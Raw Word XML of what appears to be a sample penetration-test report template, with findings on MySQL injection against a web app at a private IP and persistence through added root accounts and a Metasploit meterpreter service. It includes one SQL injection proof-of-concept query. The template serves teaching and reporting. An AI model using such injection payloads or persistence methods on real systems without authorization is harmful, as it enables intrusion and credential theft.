        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9356"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176A26A" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
                <w:color w:val="17375E"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:color="17375E"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Vulnerability Exploited: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:color="4F81BD"/>
              </w:rPr>
              <w:t>MySQL Injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F419B4B"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System Vulnerable: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>172.16.203.135</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02EF5D79"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Explanation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>: A custom web application identified was prone to SQL Injection attacks. When performing the penetration test, John noticed error-based MySQL Injection on the taxid query string parameter. While enumerating table data, John was able to successfully extract login and password credentials that were unencrypted that also matched username and password accounts for the root user account on the operating system. This allowed for a successful breach of the Linux-based operating system as well as all data contained on the system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33E19A8A"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Fix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>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70F260B8" w14:textId="77777777"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1D7579B8"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Proof of Concept Code Here:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ECB3986"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360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE “%root%"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BC8DCD9" w14:textId="77777777" w:rsidR="00DB6A85" w:rsidRDefault="00DB6A85">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="192" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="190B4428" w14:textId="38BCA0E7" w:rsidR="004C32FD" w:rsidRDefault="00896343">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="192" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
                  <w14:noFill/>
                  <w14:prstDash w14:val="solid"/>
                  <w14:bevel/>
                </w14:textOutline>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77F9324B" wp14:editId="23862983">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-44450</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>231140</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3625215" cy="419100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="20618"/>
                      <wp:lineTo x="21452" y="20618"/>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25215" cy="419100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r w:rsidR="00620F73">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>Screenshot Here:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156A8D91" w14:textId="3C0C238D" w:rsidR="00F23122" w:rsidRDefault="00F23122">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="192" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D866F8D" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc59959356"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.4 Sample Report – Maintaining Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="797222FA"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2AB4B7D9"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John added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FDD061" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc59959357"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Sample Report </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>– House Cleaning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="312FFD32"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191126A2"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14:paraId="4203C28F" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRPr="00BB687E" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc59959358"/>
      <w:r w:rsidRPr="00BB687E">
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>4.0 Additional Items Not Mentioned in the Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="254BBA26" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>This section is placed for any additional items that were not mentioned in the overall report.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004C32F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33902" w14:textId="77777777" w:rsidR="005B136D" w:rsidRDefault="005B136D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="389A5583" w14:textId="77777777" w:rsidR="005B136D" w:rsidRDefault="005B1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altName w:val="Cambria"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Roboto Bold">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Roboto Regular">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Helvetica Neue">
    <w:altName w:val="Arial"/>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EC552" w14:textId="77777777" w:rsidR="005B136D" w:rsidRDefault="005B136D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3EA59D9B" w14:textId="77777777" w:rsidR="005B136D" w:rsidRDefault="005B1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50C58"/>
    <w:rsid w:val="000B0B14"/>
    <w:rsid w:val="0015438B"/>
    <w:rsid w:val="0019713F"/>
    <w:rsid w:val="00320FAA"/>
    <w:rsid w:val="00363D5A"/>
    <w:rsid w:val="004C32FD"/>
    <w:rsid w:val="0052004E"/>
    <w:rsid w:val="00533CCE"/>
    <w:rsid w:val="0055776B"/>
    <w:rsid w:val="005B136D"/>
    <w:rsid w:val="00620F73"/>
    <w:rsid w:val="00664B38"/>
    <w:rsid w:val="00761E91"/>
    <w:rsid w:val="00896343"/>
    <w:rsid w:val="008B3E32"/>
    <w:rsid w:val="009136E0"/>
    <w:rsid w:val="0093686D"/>
    <w:rsid w:val="00A57464"/>
    <w:rsid w:val="00B45108"/>
    <w:rsid w:val="00BB687E"/>
    <w:rsid w:val="00C23375"/>
    <w:rsid w:val="00D6306A"/>
    <w:rsid w:val="00DB6A85"/>
    <w:rsid w:val="00F23122"/>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code-crafters.com/ability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2021-05-11T11:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-11T11:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>